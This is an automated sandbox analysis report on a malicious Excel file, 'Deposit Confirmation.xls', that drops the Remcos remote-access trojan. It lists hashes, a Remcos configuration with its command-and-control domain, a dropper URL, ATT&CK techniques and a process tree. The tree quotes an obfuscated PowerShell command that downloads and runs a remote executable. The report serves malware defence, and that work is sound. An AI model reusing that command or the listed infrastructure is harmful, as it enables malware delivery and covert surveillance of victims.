Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    14-10-2021 15:14

General

  • Target

    Deposit Confirmation.xls

  • Size

    74KB

  • MD5

    7a149796e5ba1764a214148af241d33c

  • SHA1

    a3b9d39fafbb8eba99ef7d313b2963078a95a80c

  • SHA256

    7bdc1c4d7eb4471e5dcf71713b266066df99928f7be8732bfb36fe153f0f5e80

  • SHA512

    35657865ddc2835915073e0bba5e5bbc9e42af6f08afbab6d6572d9c3c90dbd880ff21a51ccfe37c4baed1a8b8005354aafe8fc0baa597d3a8ad812c742ceea9

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://greenpayindia.com/wp-conternt/ConsoleApp18.exe

Extracted

Family

remcos

Version

3.3.0 Pro

Botnet

RemoteHost

C2

lplazadtemins.duckdns.org:443

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Remcos-NLSDTO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    notepad;solitaire;

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Deposit Confirmation.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\travelespecially.cmd" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://greenpayindia.com/wp-conternt/ConsoleApp18.e`xe -Destination C:\Users\Public\Documents\brotherneed.e`xe;C:\Users\Public\Documents\brotherneed.e`xe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4032
        • C:\Users\Public\Documents\brotherneed.exe
          "C:\Users\Public\Documents\brotherneed.exe"
          4⤵
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1468
          • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
            C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:2984

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
    MD5

    aade455507f667318c83c42a95b3fc3c

    SHA1

    92efbfe4546ddee6a5807a5794adea2f440cf107

    SHA256

    b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a

    SHA512

    f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd

  • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
    MD5

    aade455507f667318c83c42a95b3fc3c

    SHA1

    92efbfe4546ddee6a5807a5794adea2f440cf107

    SHA256

    b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a

    SHA512

    f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd

  • C:\Users\Public\Documents\travelespecially.cmd
    MD5

    5ea928ce876726d313001f5cbd14bc65

    SHA1

    b259839789c490d08af262d9217eddf2bfa93060

    SHA256

    6c6f74c6249e442097918f128fa0680d53504fabf1f31198ed9c4d5de3364e0f

    SHA512

    f8bceb21b86176edd8a917b000edcf2c6458e175c75ca546933caada1b6f436dd1e0a269c0989b45da5a9b48821bd97bb5db86b122e922fc8ae551b860cd2421

  • memory/1468-412-0x0000000004F00000-0x0000000004F01000-memory.dmp
    Filesize

    4KB

  • memory/1468-407-0x0000000000000000-mapping.dmp
  • memory/2072-119-0x0000026912D90000-0x0000026912D92000-memory.dmp
    Filesize

    8KB

  • memory/2072-118-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmp
    Filesize

    64KB

  • memory/2072-122-0x0000026912D90000-0x0000026912D92000-memory.dmp
    Filesize

    8KB

  • memory/2072-116-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmp
    Filesize

    64KB

  • memory/2072-115-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmp
    Filesize

    64KB

  • memory/2072-117-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmp
    Filesize

    64KB

  • memory/2072-121-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmp
    Filesize

    64KB

  • memory/2072-120-0x0000026912D90000-0x0000026912D92000-memory.dmp
    Filesize

    8KB

  • memory/2984-442-0x000000000042FC39-mapping.dmp
  • memory/2984-446-0x0000000000400000-0x0000000000479000-memory.dmp
    Filesize

    484KB

  • memory/4032-406-0x00000252EA646000-0x00000252EA648000-memory.dmp
    Filesize

    8KB

  • memory/4032-279-0x00000252EA643000-0x00000252EA645000-memory.dmp
    Filesize

    8KB

  • memory/4032-278-0x00000252EA640000-0x00000252EA642000-memory.dmp
    Filesize

    8KB

  • memory/4032-268-0x0000000000000000-mapping.dmp
  • memory/4052-265-0x0000000000000000-mapping.dmp